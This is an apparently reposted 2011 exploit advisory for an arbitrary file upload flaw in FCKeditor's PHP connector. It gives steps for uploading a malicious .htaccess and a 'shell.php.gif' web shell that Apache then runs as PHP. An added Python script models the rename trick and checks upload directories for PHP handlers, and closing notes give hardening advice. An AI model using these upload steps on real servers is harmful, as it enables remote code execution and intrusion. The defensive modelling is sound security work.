FCKeditor arbitrary file upload vulnerability (all PHP versions)
Author: anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
# Any file in this directory whose name matches _php.gif is run by the PHP engine
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor, for example through its upload/connector test pages:

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is automatically changed to "shell_php.gif".
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available on the server: FCKeditor's rename only defeats the double extension, but the .htaccess uploaded in step 2 makes Apache hand every file matching _php.gif to the PHP handler, so the renamed file is executed as PHP.
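As an added example (not part of the advisory and not sinesafe.cn's code), the script below models the two halves of the trick so the interaction is visible, and adds the check a defender would run over an upload directory: does the .htaccess there hand anything to the PHP engine? The sanitiser model (`fck_sanitize`, "every dot except the last becomes an underscore") is an assumption inferred from the rename the advisory reports, not FCKeditor's actual source; the .htaccess parser understands only the `<FilesMatch>`/`SetHandler` form used above. All function names are hypothetical.

```python
"""Model of the FCKeditor rename + attacker .htaccess, plus a defender check.
Added illustration; assumptions are marked in comments."""
import re
from typing import Optional

# The attacker's .htaccess from the advisory (straight quotes: the curly
# quotes in some reposts are not valid Apache syntax).
ATTACKER_HTACCESS = '''<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
'''


def fck_sanitize(filename: str) -> str:
    """ASSUMED model of FCKeditor's upload rename: keep only the last dot,
    turn the others into underscores (shell.php.gif -> shell_php.gif)."""
    base, dot, ext = filename.rpartition(".")
    if not dot:
        return filename
    return base.replace(".", "_") + "." + ext


def apache_filesmatch(pattern: str, filename: str) -> bool:
    """<FilesMatch> is an unanchored regex search on the basename, so the
    advisory's "_php.gif" also matches names like "x_phpXgif"."""
    return re.search(pattern, filename) is not None


def handler_for(htaccess: str, filename: str) -> Optional[str]:
    """Minimal .htaccess reader: return the SetHandler value of the first
    <FilesMatch> block whose regex matches filename, else None."""
    block_re = re.compile(r'<FilesMatch\s+"([^"]+)"\s*>(.*?)</FilesMatch>', re.S)
    for m in block_re.finditer(htaccess):
        pattern, body = m.group(1), m.group(2)
        if apache_filesmatch(pattern, filename):
            h = re.search(r"^\s*SetHandler\s+(\S+)", body, re.M)
            if h:
                return h.group(1)
    return None


def upload_is_dangerous(filename: str, htaccess: str) -> bool:
    """Would the sanitised upload be executed as PHP under this .htaccess?"""
    stored = fck_sanitize(filename)
    return (handler_for(htaccess, stored) or "").endswith("x-httpd-php")


# Defender side: flag any .htaccess in an upload tree that routes files to
# PHP via SetHandler, AddHandler or AddType, whatever the pattern.
PHP_HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+.*php", re.I | re.M)


def htaccess_enables_php(htaccess: str) -> bool:
    return PHP_HANDLER_RE.search(htaccess) is not None


if __name__ == "__main__":
    print(fck_sanitize("shell.php.gif"))
    print(upload_is_dangerous("shell.php.gif", ATTACKER_HTACCESS))
    print(htaccess_enables_php(ATTACKER_HTACCESS))
```

The takeaway for hardening is that renaming double extensions is not enough on its own: the upload handler must also refuse dotfiles (any name beginning with "."), and the upload directory should be served with `AllowOverride None` so a dropped .htaccess is ignored, with PHP execution disabled there outright (`php_admin_flag engine off` under mod_php) as a second layer.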